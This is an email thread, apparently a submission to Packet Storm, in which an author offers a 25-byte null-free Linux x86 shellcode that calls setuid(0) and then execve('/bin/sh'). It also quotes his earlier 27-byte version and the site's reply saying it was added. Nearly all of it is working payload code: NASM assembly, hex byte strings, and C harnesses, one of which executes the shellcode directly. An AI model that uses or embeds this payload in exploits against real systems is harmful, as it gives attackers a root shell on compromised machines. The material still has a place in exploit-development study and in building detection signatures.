Hi, i've shrinked down the shellcode to 25 bytes, the smallest setuid & execve GNU/Linux shellcode without nulls that spawns a shell. -------------------------------------------------------------------------------------- SMALLEST SETUID & EXECVE GNU/LINUX x86 SHELLCODE WITHOUT NULLS THAT SPAWNS A SHELL History: + v1.0 (27 bytes) => http://opensec.es/2008/11/14/gnulinux-x86-setuid0-execvebinsh00-shellcode-without-null/ + v2.0 (26 bytes) => (http://vlan7.blogspot.com/) http://packetstormsecurity.org/filedesc/smallest_setuid_execve_sc.c.html v3.0 (25 bytes) ################ [NASM_SOURCE_CODE] global _start section .text _start: ;setuid xor ecx,ecx lea eax,[ecx+17h];setuid syscall int 80h ;execve push ecx;ecx = 0 push 0x68732f6e ;sh/ push 0x69622f2f ;nib// mov ebx,esp;pointer to "struct pt_regs" lea eax,[ecx+0Bh];execve syscall int 80h [/NASM_SOURCE_CODE] [C_SOURCE_CODE] #include const char shellcode[]= "\x31\xc9\x8d\x41\x17\xcd\x80\x51\x68\x6e\x2f\x73" "\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80"; int main() { printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 SHELLCODE WITHOUT NULLS THAT SPAWNS A SHELL" "\n\nCoded by Chema Garcia (aka sch3m4)" "\n\t + sch3m4@opensec.es" "\n\t + http://opensec.es" "\n\n[+] Date: 22/11/2008" "\n\n[+] Thanks to: vlan7" "\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1); (*(void (*)()) shellcode)(); return 0; } [/C_SOURCE_CODE] -------------------------------------------------------------------------------------- Could you add it? Greetings, Chema García packet@packetstormsecurity.org escribió: > Thanks; added! > > > http://packetstormsecurity.org/shellcode/smallnonulls-exec.txt fbe997136460672e07de13d11aba57fc 27 bytes small GNU/Linux x86 setuid(0) && execve("/bin/sh",0,0) shellcode without NULLs.  Homepage: http://opensec.es/. Authored By Chema Garcia > > On Thu, Nov 13, 2008 at 09:46:57PM +0100, sch3m4 wrote: > >> Hello, I've developped the smallest linux x86 setuid(0) & >> execve("/bin/sh",0,0) shellcode without nullls with a size of 27bytes. >> >> -----------[ C Source Code ]----------- >> /* >> Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode >> without NULLs >> >> Coded by Chema Garcia (aka sch3m4) >> + sch3m4@opensec.es >> + http://opensec.es >> Shellcode Size: 27 bytes >> Date: 13/11/2008 >> */ >> >> >> #include >> >> const char shellcode[]= "\x31\xC0" //xor eax,eax >> "\x31\xC9" //xor ecx,ecx >> "\xB0\x17" //mov al,17h >> "\x60" //pusha >> "\xCD\x80" //int 80h >> "\x61" //popa >> "\x51" //push ecx >> "\x68\x6E\x2F\x73\x68" //push 0x68732f6e >> "\x68\x2F\x2F\x62\x69" //push 0x69622f2f >> "\x89\xE3" //mov ebx, esp >> "\xB0\x0B" //mov al,0xb >> "\xCD\x80"; //int 0x80 >> >> int main() >> { >> printf("Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) >> Shellcode without NULLs" >> "\n\nCoded by Chema Garcia (aka sch3m4)" >> "\n\t + sch3m4@opensec.es" >> "\n\t + http://opensec.es" >> "\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1); >> //(*(void (*)()) shellcode)(); >> >> return 0; >> } >> >> -----------[/ C Source Code ]----------- >> >> -----------[ ASM Source Code ]----------- >> global _start >> >> section .text >> >> _start: >> >> xor eax,eax >> xor ecx,ecx >> mov al,17h >> pusha >> int 80h ;setuid >> popa >> push ecx >> push 0x68732f6e >> push 0x69622f2f >> mov ebx, esp >> mov al,0xb >> int 0x80;execve >> >> -----------[/ ASM Source Code ]----------- >> >> Greetings, >> Chema García >> > >